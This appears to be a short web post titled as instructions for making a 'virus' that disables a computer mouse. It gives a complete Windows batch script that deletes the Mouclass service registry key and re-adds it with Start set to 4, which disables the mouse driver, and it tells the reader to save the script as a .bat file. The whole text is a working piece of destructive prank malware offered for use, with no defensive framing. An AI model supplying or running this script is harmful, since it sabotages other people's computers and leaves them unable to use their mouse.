How to make a virus that disables a mouse
Copy and pest this code in notepad rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem ------------------------------ now save the file as anything.bat